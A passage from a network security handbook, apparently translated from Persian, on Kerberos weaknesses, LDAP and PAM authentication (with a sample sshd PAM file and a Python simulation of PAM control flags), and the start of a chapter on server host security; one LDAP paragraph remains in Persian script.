By design, Kerberos requires a secure central server that holds the master password database and is continuously available. To ensure security, organizations should use the Kerberos server machine for nothing other than the Kerberos server. The Kerberos server must always be kept under lock and key in a physically secure area. If the Kerberos server goes down, the entire Kerberos network becomes unusable.

The Kerberos server encrypts all of the stored passwords with the server's master key, which is located on the same hard disk as the encrypted passwords. This means that if the Kerberos server is compromised, all user passwords must be changed.

[179] Jason Heiss offers a good guide to these applications on a page on his web site titled "Replacing NIS with Kerberos and LDAP", at http://www.ofb.net/~jheiss/krbldap.
Kerberos does not address modification of system software (Trojan horses)

Kerberos does not have the local workstation authenticate itself to the user; that is, the user sitting at the computer has no way of knowing whether the computer has been compromised. This shortcoming is easily exploited by an attacker who is aware of it. These problems are consequences of the fact that, even in a networked environment, many workstations hold local copies of the programs they run.

Kerberos may result in a cascading loss of trust

If the password of a server or of a user is disclosed, an eavesdropper can use that password to decrypt other tickets and use this information to spoof servers and users.

Kerberos is a workable system for network security and is widely used; more importantly, its underlying principles are increasingly found in network security systems that are available directly from vendors.

LDAP

The Lightweight Directory Access Protocol (LDAP) is a low-overhead version of the X.500 directory access service that is used to store directory information (such as authentication systems, usernames, and passwords) with access over a secure network channel. There are two major versions of LDAP. LDAPv2, described in RFC 1777 in 1995, provides no special security mechanism for passwords unless it is implemented in conjunction with Kerberos. LDAPv3, described in RFC 2251, also supports SASL [180]. SASL provides several additional ways of securing password authentication (including Kerberos!). In addition, both the widely used open source implementation of LDAPv3 (OpenLDAP 2.x) and the most widely used commercial implementation (Microsoft's Active Directory, in versions beginning with Windows 2000) support the use of SSL/TLS to secure the entire communication link between client and server, including the authentication procedures.
LDAP by itself provides many general directory services. For example, many organizations use LDAP to organize employees' phone numbers, email addresses, and address lists. We discuss LDAP in this chapter because it can form the basis of a network information and authentication system, and because it is increasingly being used for these purposes, particularly on Windows and Linux systems.

The LDAP protocol

The information on an LDAP server is organized as a tree of entries, each of which belongs to one or more object classes and has attributes that hold its values. Each entry has an attribute named "cn" (common name) that distinguishes it from other entries with the same parent in the tree.

For example, an entry that belongs to the object class "posixAccount" has attributes that specify the user's full name (cn), login name (uid), user ID number and group ID number (uidNumber and gidNumber), home directory (homeDirectory), login shell (loginShell), and other user information.

In LDAP terminology, a schema is a set of object classes and attribute definitions that are logically related. The posixAccount object class is defined in the network information service schema (nis.schema).

LDAP is a client-server protocol. An LDAP client sends requests to an LDAP server and receives its responses. Clients can send requests to make changes, to perform a search, to return one or more attributes of a particular entry, or to return an entire subtree of the entries held on the server.

[180] Simple Authentication and Security Layer, RFC 2222.
ﺟﺎﻣﻌﻴﺖ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻣﺪﺭﻥ ) LDAPﻣﺜﻞ Active Directoryﻳـﺎ (OpenLDAP 2.xﭼﻨﺪ ﻗﺎﺑﻠﻴﺖ ﻣﻬﻢ ﺍﺭﺍﺋـﻪ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ ﺟﺎﻣﻌﻴـﺖ ﺩﺍﺩﻩ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻨﺪ: ﺟﺎﻣﻌﻴﺖ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺩﺍﺩﻩ ١٨٤ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ LDAPﻣﻲﺗﻮﺍﻧﺪ ﺍﺗﺼﺎﻻﺕ ﺍﻳﻤﻦﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ TLSﺭﺍ ﺑﭙﺬﻳﺮﺩ ،ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻧﺘﻬـﺎ ﺑـﻪ ﺍﻧﺘﻬـﺎ ﺭﺍ ﺩﺭ ﺗﻌـﺎﻣﻼﺕ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ -ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺭﺍﺋﻪ ﻛﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ TLS ،ﺍﻧﺠﺎﻡ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻏﻴﺮﻣﻤﻜﻦ ﻣﻲﺳﺎﺯﺩ. ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ،TLSﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ LDAPﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻧﺴﺒﺖ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﻀﺎ ﺷﺪﻩ ﺍﺳﺖ .ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ LDAPﺑﺎ ﺁﻥ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻨﺪ ﻛﻪ ﺑﺎ ﻫﻤﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﺍﻱ ﻛـﻪ ﻣـﻲﺧﻮﺍﺳـﺘﻨﺪ ﺍﺭﺗﺒﺎﻁ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩﺍﻧﺪ. ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ LDAPﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﺳـﺮﻭﻳﺲﮔﻴﺮﻧـﺪﻩﻫـﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻱ TLSﺑﺨﻮﺍﻫﻨـﺪ ،ﺗـﺎ ﺗـﻀﻤﻴﻦ ﻛﻨﻨـﺪ ﻛـﻪ ﺗﻨﻬـﺎ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﮔﺎﻥ ﻣﺠﺎﺯ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ queryﺑﻔﺮﺳﺘﻨﺪ ﻳﺎ ﺁﻧﺮﺍ ﺑﻪ ﺭﻭﺯ ﻛﻨﻨﺪ. ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ LDAPﻣﻲﺗﻮﺍﻧﺪ ﺗﻤﺎﻡ ﻣﺨﺎﺯﻥ ﺩﺍﺩﺓ LDAPﺭﺍ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﺗﻜﺜﻴﺮ ﻛﻨﺪ ﺗـﺎ ﺩﺭﺻـﻮﺭﺕ ﺧـﺮﺍﺏ ﺷـﺪﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ،ﺍﻃﻼﻋﺎﺕ ﺣﻴﺎﺗﻲ LDAPﺍﺯ ﺩﺳﺖ ﻧﺮﻭﺩ. LDAPﻳﻚ ﺟﺎﻳﮕﺰﻳﻦ ﻗﺪﺭﺗﻤﻨﺪ ﻭ ﺍﻧﻌﻄﺎﻑﭘﺬﻳﺮ ﺑﺮﺍﻱ NISﻭ NIS+ﺍﺳﺖ .ﺩﺭ ﻛﻨﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺩﺍﺩﻩﻫـﺎﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ،ﺍﺯ ﻣﺰﺍﻳـﺎﻱ ﺍﺻﻠﻲ LDAPﺗﻮﺍﻧﺎﻳﻲ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻥ ﻭ ﺍﺭﺍﺋﻪ ﺳﺮﻭﻳﺲ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻏﻴﺮ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻭﺟﻮﺩ ﺍﺭﺗﺒﺎﻁ ﺍﻳﻤـﻦﺷـﺪﻩ ﺑﻮﺳﻴﻠﺔ TLSﺍﺳﺖ .ﺍﺷﻜﺎﻝ ﺍﺻـﻠﻲ LDAPﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﺓ ﺁﻥ ﺑـﺴﻴﺎﺭ ﭘﻴﭽﻴـﺪﻩﺗـﺮ ﺍﺯ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻳـﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ NISﺍﺳﺖ ،ﺍﻣﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺳﺎﺩﻩﺳﺎﺯﻱ ﺭﺍﻫﺒﺮﻱ LDAPﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ. 
[182] Schema
[183] Object Classes
[184] End-to-End Encryption

Authentication with LDAP

RFC 2307 describes an approach to using LDAP as a network information system. Although this RFC does not specify an Internet standard, its mechanisms are widely used, and a schema that implements it (nis.schema) is included in OpenLDAP 2.x. This schema defines the object classes that represent users (posixAccount and shadowAccount), groups (posixGroup), services (ipService), protocols (ipProtocol), remote procedure calls (oncRpc), hosts (ipHost), networks (ipNetwork), NIS netgroups (nisNetgroup, nisMap, nisObject), and other items.

Every service that authenticates users must be rewritten to interact with LDAP; this is similar to the "kerberizing" process that was required to work with Kerberos. This approach is simple for operating systems such as Microsoft Windows, which require all authentication to go through an application programming interface [185] published by the vendor, although a very small part of the client software still has to be rewritten.

This approach is not very practical for Unix-based operating systems. Instead, two alternative approaches have emerged, released as open source software by PADL Software and included in most Linux distributions. The first is nss_ldap, which modifies the C library functions that obtain user information (such as getpwent()) so that they transparently use an LDAP database instead of local files, NIS, and so on. Many systems already allowed these functions to draw on different information sources by means of a name service switch [186] file (usually /etc/nsswitch.conf). [187]
The second approach uses the PAM framework, which is discussed in the next section. LDAP authentication is implemented as a PAM module, pam_ldap. Unlike libnss_ldap, pam_ldap uses the LDAP database only to authenticate users and does not distribute any other information from the database. If your LDAP server uses the standard nis.schema, adding LDAP authentication to a PAM-controlled service is as simple as adding a line to its PAM configuration file that specifies pam_ldap.so as "sufficient" for authentication, account validation, and password changes.

Pluggable Authentication Modules [188]

Because there are so many ways to authenticate users, it is better to have a single approach to authentication that can accommodate several authentication systems for different needs. The Pluggable Authentication Modules (PAM) system is one such approach. PAM was originally developed by Sun, and its implementations for Solaris, FreeBSD, and especially Linux are the most widely used. PAM provides a library and an application programming interface that any application can use instead of its own authentication system. Each authentication system that PAM knows about is implemented as a PAM module, in practice as a dynamically loaded shared library. PAM modules are available to authenticate users through:

• /etc/passwd or /etc/shadow files;
• NIS or NIS+;
• LDAP;
• Kerberos 4 or Kerberos 5; and
• an arbitrary Berkeley database file. [189]

Each PAM-aware service is configured either in the /etc/pam.conf file or, more commonly, in its own file in the /etc/pam.d directory. For example, the PAM configuration file for the ssh server on Linux distributions is /etc/pam.d/sshd.

[185] Application Programming Interface (API)
[186] Name Service Switch
[187] For more details on configuring authentication using libnss-ldap, see pages 450 to 453 of PUIS.
[188] Pluggable Authentication Modules
A service named "other" is used to provide defaults for PAM-aware services that have not been configured explicitly. Below is an example of a PAM configuration file for sshd on a Linux server:

    auth required /lib/security/pam_env.so
    auth sufficient /lib/security/pam_unix.so
    auth required /lib/security/pam_deny.so
    account required /lib/security/pam_unix.so
    password required /lib/security/pam_cracklib.so retry=3
    password sufficient /lib/security/pam_unix.so nullok use_authtok md5 shadow
    password required /lib/security/pam_deny.so
    session required /lib/security/pam_limits.so
    session required /lib/security/pam_unix.so

The "auth" lines define the authentication process for this service, which is followed in the order given. Modules marked "required" must run successfully; if they fail, the user is treated as unauthenticated and is denied access. Several "required" modules can be specified, in which case all of them must run successfully. Modules marked "sufficient" are, if they run successfully, enough to authenticate the user, and they end the authentication process.

This particular configuration file also enforces all of the system's rules on the aging or expiration of user accounts, and it places limits on the resources available to the user's sshd session. If sshd also offered the ability to change passwords, this configuration file would prevent users from changing to a password that is easy to guess, and it would store passwords in /etc/shadow encrypted with the MD5 cryptographic function.
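The way "required" and "sufficient" interact, and the effect of adding a pam_ldap.so line as described earlier, can be traced with a short simulation. The Python below is an added example, not code from the handbook or from any PAM implementation; it models only those two control flags, takes each module's success or failure as an input, and assumes that pam_ldap.so sits under /lib/security and is listed before pam_unix.

```python
import os

# Constructed sample: the auth lines of the sshd PAM file quoted on this page.
SSHD_AUTH = """\
auth required /lib/security/pam_env.so
auth sufficient /lib/security/pam_unix.so
auth required /lib/security/pam_deny.so
"""
# Assumption: pam_ldap.so lives beside the other modules and is tried before pam_unix.
LDAP_LINE = "auth sufficient /lib/security/pam_ldap.so\n"
SSHD_AUTH_LDAP = SSHD_AUTH.replace("auth sufficient", LDAP_LINE + "auth sufficient", 1)

def parse_stack(text, phase="auth"):
    """Return [(control_flag, module_name), ...] for one PAM phase, in file order."""
    stack = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[0] == phase:
            name = os.path.splitext(os.path.basename(fields[2]))[0]
            stack.append((fields[1], name))
    return stack

def evaluate(stack, outcomes):
    """Walk a stack using the two control flags the page describes.

    outcomes maps module name -> True (module succeeded) or False (module failed).
    Returns (access_granted, modules_that_ran).
    """
    required_failed, succeeded, ran = False, False, []
    for control, module in stack:
        ok = outcomes[module]
        ran.append(module)
        if control == "required":
            succeeded = succeeded or ok
            required_failed = required_failed or not ok  # remembered; stack continues
        elif control == "sufficient":
            if ok and not required_failed:
                return True, ran  # success ends the stack immediately
            # a failed "sufficient" module is ignored and the next line is tried
        else:
            raise ValueError("control flag not modelled: " + control)
    return succeeded and not required_failed, ran

if __name__ == "__main__":
    base = {"pam_env": True, "pam_deny": False}  # pam_deny always fails
    local, ldap = parse_stack(SSHD_AUTH), parse_stack(SSHD_AUTH_LDAP)
    print(evaluate(local, dict(base, pam_unix=True)))    # local password accepted
    print(evaluate(local, dict(base, pam_unix=False)))   # falls through to pam_deny
    print(evaluate(ldap, dict(base, pam_ldap=True, pam_unix=False)))  # directory-only user
```

In this model a failed pam_env still ends in denial even when pam_unix accepts the password: the remembered "required" failure blocks the "sufficient" shortcut, so the stack runs on to pam_deny.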
In this example, the first module to run is pam_env, which optionally sets or clears the environment variables listed in /etc/security/pam_env.conf. This module is "required": it must run successfully for authentication to proceed. The next module to run is pam_unix, which performs authentication against the Unix password files, /etc/passwd and /etc/shadow. If this succeeds, it is sufficient to authenticate the user and the process is complete. The last authentication module is pam_deny, which simply fails, so that an unsuccessful authentication process is brought to an end.

The PAM subsystem can be configured in several different ways. For example, it is possible to require two or three separate passwords for some accounts, [190] to combine a biometric method with a passphrase, or to apply different mechanisms depending on the time of day. On the other hand, in physically very secure locations it is even possible to dispense with passwords altogether. PAM lets the administrator choose whatever policy best matches the risk to the available technology.

[189] If these layers are not enough for you, some applications, such as SMTP authentication in Sendmail or access to mailboxes managed by the Cyrus imapd server, use the Cyrus SASL (simple authentication and security layer) authentication library, which can authenticate users against a separate database or through PAM! It is not inconceivable that you might use LDAP-based PAM-based SASL to authenticate a user's imap connection.
PAM, as the examples above make clear, can do far more than just authentication. One of its strengths is that it cleanly separates the four phases of the access process: verifying that the account is permitted to use the requested service, at the requested time, and from the requested location (the account phase); authenticating the user (the auth phase); updating passwords and other authentication tokens when that is necessary (the password phase); and setting up and tearing down the user's session (the session phase), which can also include limiting access to resources and creating audit trails.

[190] When one user holds all of the passwords, the value of this is debatable. The approach can be useful when the passwords are assigned to different users, so that every login requires two or more people and creates a "witnessed" trail.

Chapter Six
Server Security

Overview

A server, in general terms, is a computer that hosts various server programs, which run on it. In this chapter we discuss some of the most common security problems that arise when computers are used as servers for information services, and we describe how to deploy and configure servers so as to minimize these problems. The chapter first examines host security [191] and then the security considerations for the applications used as mail servers, file servers, web servers, database servers, and name servers.

Host Security

Many organizations that run their own servers on the Internet do not secure those servers against external attack. Users still choose passwords that are easy to guess, and many passwords are easily captured and stolen by Internet packet sniffer software. [192]
Today there are thousands of organized and semi-organized groups of attackers who exchange information about computer vulnerabilities and the methods for exploiting them. Techniques, and in many cases complete programs, for penetrating the security layers of systems are widely distributed by e-mail, newsgroups, web pages, and Internet Relay Chat (IRC), [193] and anti-security tools (password sniffers, [194] denial-of-service exploit files, and Trojan horses) are also publicly available.

Attackers now use automated tools to search for vulnerable computers and, in some cases, to break into them automatically, plant back doors, and hide the damage done. High-speed Internet connections have made it possible for attackers to scan millions of computers for security vulnerabilities within a short period of time.

The Honey Pot Project [195] (http://project.honypot.org/) is an open Internet research project that aims to measure the scale of the attacker community by placing vulnerable computers on the Internet and observing how quickly they are attacked. The results of this project are not at all encouraging. In June 2001, for example, it was announced that, according to the project's findings, a Red Hat 6.2 system will on average be compromised by an attacker using a well-known exploit only 72 hours after it is connected to the Internet. A typical system connected to the Internet is scanned by attackers many times a day. Computers running Windows 98 with file sharing enabled (one of the default settings for most home users) are scanned on the Internet once an hour on average, and are usually broken into on the very first day. In one case, a server was broken into after only 15 minutes of being connected to the Internet!

[191] Host Security
[192] Packet Sniffer Software
[193] Internet Relay Chat
[194] Password Sniffers
[195] Honey Pot
It is wishful thinking to imagine that host security can be achieved by following a list of "dos" and "don'ts" for networks and computers. It might be argued that, in any case, an attacker has to gain access to a computer in order to damage it, and therefore that in theory all you need to do to secure a system is to block every avenue by which an attacker could reach it, after which the system would be secure. In practice, however, experience has shown that it is almost impossible to have a computer that offers services on a network while every avenue of attacker access to it is blocked, because attackers' access usually comes from